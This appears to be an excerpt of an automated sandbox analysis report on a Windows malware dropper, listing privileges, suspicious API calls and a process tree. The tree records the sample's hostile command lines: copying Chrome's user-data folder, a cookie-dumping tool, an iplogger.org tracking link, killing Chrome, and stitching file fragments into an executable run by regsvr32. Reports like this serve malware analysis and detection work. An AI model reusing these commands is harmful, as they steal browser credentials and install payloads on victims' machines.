Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeManageVolumePrivilege N/A C:\Users\Admin\AppData\Local\Temp\md3_3kvm.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\ubisoftant.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ubisoftant.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3076 wrote to memory of 4216 N/A C:\Users\Admin\AppData\Local\Temp\66dc47363eed7c1f7528e1859a32037020450756eb0ce8950df397a64058481c.exe C:\Users\Admin\AppData\Local\Temp\file_clu.exe
PID 3076 wrote to memory of 4216 N/A C:\Users\Admin\AppData\Local\Temp\66dc47363eed7c1f7528e1859a32037020450756eb0ce8950df397a64058481c.exe C:\Users\Admin\AppData\Local\Temp\file_clu.exe
PID 3076 wrote to memory of 4216 N/A C:\Users\Admin\AppData\Local\Temp\66dc47363eed7c1f7528e1859a32037020450756eb0ce8950df397a64058481c.exe C:\Users\Admin\AppData\Local\Temp\file_clu.exe
PID 3076 wrote to memory of 1348 N/A C:\Users\Admin\AppData\Local\Temp\66dc47363eed7c1f7528e1859a32037020450756eb0ce8950df397a64058481c.exe C:\Users\Admin\AppData\Local\Temp\md3_3kvm.exe
PID 3076 wrote to memory of 1348 N/A C:\Users\Admin\AppData\Local\Temp\66dc47363eed7c1f7528e1859a32037020450756eb0ce8950df397a64058481c.exe C:\Users\Admin\AppData\Local\Temp\md3_3kvm.exe
PID 3076 wrote to memory of 1348 N/A C:\Users\Admin\AppData\Local\Temp\66dc47363eed7c1f7528e1859a32037020450756eb0ce8950df397a64058481c.exe C:\Users\Admin\AppData\Local\Temp\md3_3kvm.exe
PID 3076 wrote to memory of 3404 N/A C:\Users\Admin\AppData\Local\Temp\66dc47363eed7c1f7528e1859a32037020450756eb0ce8950df397a64058481c.exe C:\Users\Admin\AppData\Local\Temp\asj.exe
PID 3076 wrote to memory of 3404 N/A C:\Users\Admin\AppData\Local\Temp\66dc47363eed7c1f7528e1859a32037020450756eb0ce8950df397a64058481c.exe C:\Users\Admin\AppData\Local\Temp\asj.exe
PID 3076 wrote to memory of 3404 N/A C:\Users\Admin\AppData\Local\Temp\66dc47363eed7c1f7528e1859a32037020450756eb0ce8950df397a64058481c.exe C:\Users\Admin\AppData\Local\Temp\asj.exe
PID 3076 wrote to memory of 1992 N/A C:\Users\Admin\AppData\Local\Temp\66dc47363eed7c1f7528e1859a32037020450756eb0ce8950df397a64058481c.exe C:\Users\Admin\AppData\Local\Temp\secd.exe
PID 3076 wrote to memory of 1992 N/A C:\Users\Admin\AppData\Local\Temp\66dc47363eed7c1f7528e1859a32037020450756eb0ce8950df397a64058481c.exe C:\Users\Admin\AppData\Local\Temp\secd.exe
PID 3076 wrote to memory of 1992 N/A C:\Users\Admin\AppData\Local\Temp\66dc47363eed7c1f7528e1859a32037020450756eb0ce8950df397a64058481c.exe C:\Users\Admin\AppData\Local\Temp\secd.exe
PID 3076 wrote to memory of 4596 N/A C:\Users\Admin\AppData\Local\Temp\66dc47363eed7c1f7528e1859a32037020450756eb0ce8950df397a64058481c.exe C:\Users\Admin\AppData\Local\Temp\cld.exe
PID 3076 wrote to memory of 4596 N/A C:\Users\Admin\AppData\Local\Temp\66dc47363eed7c1f7528e1859a32037020450756eb0ce8950df397a64058481c.exe C:\Users\Admin\AppData\Local\Temp\cld.exe
PID 3076 wrote to memory of 4596 N/A C:\Users\Admin\AppData\Local\Temp\66dc47363eed7c1f7528e1859a32037020450756eb0ce8950df397a64058481c.exe C:\Users\Admin\AppData\Local\Temp\cld.exe
PID 3076 wrote to memory of 1760 N/A C:\Users\Admin\AppData\Local\Temp\66dc47363eed7c1f7528e1859a32037020450756eb0ce8950df397a64058481c.exe C:\Users\Admin\AppData\Local\Temp\ubisoftant.exe
PID 3076 wrote to memory of 1760 N/A C:\Users\Admin\AppData\Local\Temp\66dc47363eed7c1f7528e1859a32037020450756eb0ce8950df397a64058481c.exe C:\Users\Admin\AppData\Local\Temp\ubisoftant.exe
PID 3076 wrote to memory of 1760 N/A C:\Users\Admin\AppData\Local\Temp\66dc47363eed7c1f7528e1859a32037020450756eb0ce8950df397a64058481c.exe C:\Users\Admin\AppData\Local\Temp\ubisoftant.exe
PID 3076 wrote to memory of 3504 N/A C:\Users\Admin\AppData\Local\Temp\66dc47363eed7c1f7528e1859a32037020450756eb0ce8950df397a64058481c.exe C:\Users\Admin\AppData\Local\Temp\piz.exe
PID 3076 wrote to memory of 3504 N/A C:\Users\Admin\AppData\Local\Temp\66dc47363eed7c1f7528e1859a32037020450756eb0ce8950df397a64058481c.exe C:\Users\Admin\AppData\Local\Temp\piz.exe
PID 3076 wrote to memory of 3504 N/A C:\Users\Admin\AppData\Local\Temp\66dc47363eed7c1f7528e1859a32037020450756eb0ce8950df397a64058481c.exe C:\Users\Admin\AppData\Local\Temp\piz.exe
PID 3076 wrote to memory of 4068 N/A C:\Users\Admin\AppData\Local\Temp\66dc47363eed7c1f7528e1859a32037020450756eb0ce8950df397a64058481c.exe C:\Users\Admin\AppData\Local\Temp\update_b1f99b.exe
PID 3076 wrote to memory of 4068 N/A C:\Users\Admin\AppData\Local\Temp\66dc47363eed7c1f7528e1859a32037020450756eb0ce8950df397a64058481c.exe C:\Users\Admin\AppData\Local\Temp\update_b1f99b.exe
PID 3076 wrote to memory of 4068 N/A C:\Users\Admin\AppData\Local\Temp\66dc47363eed7c1f7528e1859a32037020450756eb0ce8950df397a64058481c.exe C:\Users\Admin\AppData\Local\Temp\update_b1f99b.exe
PID 4216 wrote to memory of 3436 N/A C:\Users\Admin\AppData\Local\Temp\file_clu.exe C:\Windows\SysWOW64\cmd.exe
PID 4216 wrote to memory of 3436 N/A C:\Users\Admin\AppData\Local\Temp\file_clu.exe C:\Windows\SysWOW64\cmd.exe
PID 4216 wrote to memory of 3436 N/A C:\Users\Admin\AppData\Local\Temp\file_clu.exe C:\Windows\SysWOW64\cmd.exe
PID 3076 wrote to memory of 1808 N/A C:\Users\Admin\AppData\Local\Temp\66dc47363eed7c1f7528e1859a32037020450756eb0ce8950df397a64058481c.exe C:\Users\Admin\AppData\Local\Temp\setup.exe
PID 3076 wrote to memory of 1808 N/A C:\Users\Admin\AppData\Local\Temp\66dc47363eed7c1f7528e1859a32037020450756eb0ce8950df397a64058481c.exe C:\Users\Admin\AppData\Local\Temp\setup.exe
PID 3076 wrote to memory of 1808 N/A C:\Users\Admin\AppData\Local\Temp\66dc47363eed7c1f7528e1859a32037020450756eb0ce8950df397a64058481c.exe C:\Users\Admin\AppData\Local\Temp\setup.exe
PID 1992 wrote to memory of 2280 N/A C:\Users\Admin\AppData\Local\Temp\secd.exe C:\Users\Admin\AppData\Local\Temp\RarSFX1\quv.exe
PID 1992 wrote to memory of 2280 N/A C:\Users\Admin\AppData\Local\Temp\secd.exe C:\Users\Admin\AppData\Local\Temp\RarSFX1\quv.exe
PID 1992 wrote to memory of 2280 N/A C:\Users\Admin\AppData\Local\Temp\secd.exe C:\Users\Admin\AppData\Local\Temp\RarSFX1\quv.exe
PID 3504 wrote to memory of 2712 N/A C:\Users\Admin\AppData\Local\Temp\piz.exe C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
PID 3504 wrote to memory of 2712 N/A C:\Users\Admin\AppData\Local\Temp\piz.exe C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
PID 3504 wrote to memory of 2712 N/A C:\Users\Admin\AppData\Local\Temp\piz.exe C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
PID 4596 wrote to memory of 3484 N/A C:\Users\Admin\AppData\Local\Temp\cld.exe C:\Users\Admin\AppData\Local\Temp\RarSFX2\per.exe
PID 4596 wrote to memory of 3484 N/A C:\Users\Admin\AppData\Local\Temp\cld.exe C:\Users\Admin\AppData\Local\Temp\RarSFX2\per.exe
PID 3076 wrote to memory of 1180 N/A C:\Users\Admin\AppData\Local\Temp\66dc47363eed7c1f7528e1859a32037020450756eb0ce8950df397a64058481c.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3076 wrote to memory of 1180 N/A C:\Users\Admin\AppData\Local\Temp\66dc47363eed7c1f7528e1859a32037020450756eb0ce8950df397a64058481c.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1180 wrote to memory of 2896 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1180 wrote to memory of 2896 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3436 wrote to memory of 3628 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\RwJ2xhfygvdE.exe
PID 3436 wrote to memory of 3628 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\RwJ2xhfygvdE.exe
PID 3436 wrote to memory of 3628 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\RwJ2xhfygvdE.exe
PID 3628 wrote to memory of 3768 N/A C:\Users\Admin\AppData\Local\Temp\RwJ2xhfygvdE.exe C:\Windows\system32\svchost.exe
PID 3628 wrote to memory of 3768 N/A C:\Users\Admin\AppData\Local\Temp\RwJ2xhfygvdE.exe C:\Windows\system32\svchost.exe
PID 3628 wrote to memory of 3768 N/A C:\Users\Admin\AppData\Local\Temp\RwJ2xhfygvdE.exe C:\Windows\system32\svchost.exe
PID 3436 wrote to memory of 1044 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 3436 wrote to memory of 1044 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 3436 wrote to memory of 1044 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 3404 wrote to memory of 4848 N/A C:\Users\Admin\AppData\Local\Temp\asj.exe C:\Windows\SysWOW64\cmd.exe
PID 3404 wrote to memory of 4848 N/A C:\Users\Admin\AppData\Local\Temp\asj.exe C:\Windows\SysWOW64\cmd.exe
PID 3404 wrote to memory of 4848 N/A C:\Users\Admin\AppData\Local\Temp\asj.exe C:\Windows\SysWOW64\cmd.exe
PID 1180 wrote to memory of 4764 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1180 wrote to memory of 4764 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1180 wrote to memory of 4764 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1180 wrote to memory of 4764 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1180 wrote to memory of 4764 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1180 wrote to memory of 4764 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1180 wrote to memory of 4764 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1180 wrote to memory of 4764 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1180 wrote to memory of 4764 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1180 wrote to memory of 4764 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Processes

C:\Users\Admin\AppData\Local\Temp\66dc47363eed7c1f7528e1859a32037020450756eb0ce8950df397a64058481c.exe

"C:\Users\Admin\AppData\Local\Temp\66dc47363eed7c1f7528e1859a32037020450756eb0ce8950df397a64058481c.exe"

C:\Users\Admin\AppData\Local\Temp\file_clu.exe

"C:\Users\Admin\AppData\Local\Temp\file_clu.exe"

C:\Users\Admin\AppData\Local\Temp\md3_3kvm.exe

"C:\Users\Admin\AppData\Local\Temp\md3_3kvm.exe"

C:\Users\Admin\AppData\Local\Temp\asj.exe

"C:\Users\Admin\AppData\Local\Temp\asj.exe"

C:\Users\Admin\AppData\Local\Temp\secd.exe

"C:\Users\Admin\AppData\Local\Temp\secd.exe"

C:\Users\Admin\AppData\Local\Temp\cld.exe

"C:\Users\Admin\AppData\Local\Temp\cld.exe"

C:\Users\Admin\AppData\Local\Temp\ubisoftant.exe

"C:\Users\Admin\AppData\Local\Temp\ubisoftant.exe"

C:\Users\Admin\AppData\Local\Temp\piz.exe

"C:\Users\Admin\AppData\Local\Temp\piz.exe"

C:\Users\Admin\AppData\Local\Temp\update_b1f99b.exe

"C:\Users\Admin\AppData\Local\Temp\update_b1f99b.exe"

C:\Users\Admin\AppData\Local\Temp\setup.exe

"C:\Users\Admin\AppData\Local\Temp\setup.exe"

C:\Users\Admin\AppData\Local\Temp\RarSFX1\quv.exe

"C:\Users\Admin\AppData\Local\Temp\RarSFX1\quv.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /C copy /Y "C:\Users\Admin\AppData\Local\Temp\file_clu.exe" ..\RwJ2xhfygvdE.exe&& stArt ..\RwJ2xhfygvdE.exe /Pxcee7dXhg1LR & If "" == "" for %H In ( "C:\Users\Admin\AppData\Local\Temp\file_clu.exe" ) do taskkill /iM "%~nxH" /F

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt

C:\Users\Admin\AppData\Local\Temp\RarSFX2\per.exe

"C:\Users\Admin\AppData\Local\Temp\RarSFX2\per.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.org/1wNij7

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffdfac246f8,0x7ffdfac24708,0x7ffdfac24718

C:\Users\Admin\AppData\Local\Temp\RwJ2xhfygvdE.exe

..\RwJ2xhfygvdE.exe /Pxcee7dXhg1LR

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /C copy /Y "C:\Users\Admin\AppData\Local\Temp\RwJ2xhfygvdE.exe" ..\RwJ2xhfygvdE.exe&& stArt ..\RwJ2xhfygvdE.exe /Pxcee7dXhg1LR & If "/Pxcee7dXhg1LR " == "" for %H In ( "C:\Users\Admin\AppData\Local\Temp\RwJ2xhfygvdE.exe" ) do taskkill /iM "%~nxH" /F

C:\Windows\SysWOW64\taskkill.exe

taskkill /iM "file_clu.exe" /F

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c taskkill /f /im chrome.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2124,3317520153715266214,10800547276621730904,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2136 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2124,3317520153715266214,10800547276621730904,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2188 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2124,3317520153715266214,10800547276621730904,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2716 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,3317520153715266214,10800547276621730904,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3332 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,3317520153715266214,10800547276621730904,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3344 /prefetch:1

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 4068 -ip 4068

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /Q /C eCho | SEt /p = "MZ" > wUAR.VX & cOPy /Y /B wUAr.vX +~TED1E2.CFH + G62c.4+ H7__2BUr.8I + 3O0QMRE.5K + C1SM1U.Qa0 +s77950_.98+ MzfNNq.QI + W8Te.Qm7 + ALXC.kJM + 18CHh.JB + gWp3M.DH + 2CmT.ZW ..\_MORBZV.~5 &sTaRT regsvr32 -s ..\_MOrBZV.~5 -U& DEl /q *

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4068 -s 340

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im chrome.exe

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" eCho "

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" SEt /p = "MZ" 1>wUAR.VX"

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt

C:\Windows\SysWOW64\regsvr32.exe

regsvr32 -s ..\_MOrBZV.~5 -U

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2124,3317520153715266214,10800547276621730904,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5232 /prefetch:8

C:\Windows\SysWOW64\xcopy.exe

xcopy "C:\Users\Admin\AppData\Local\Google\Chrome\User Data" "C:\Users\Admin\AppData\Local\Temp\bhjkgfgzxdd99\" /s /e /y

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2124,3317520153715266214,10800547276621730904,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5232 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,3317520153715266214,10800547276621730904,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4668 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

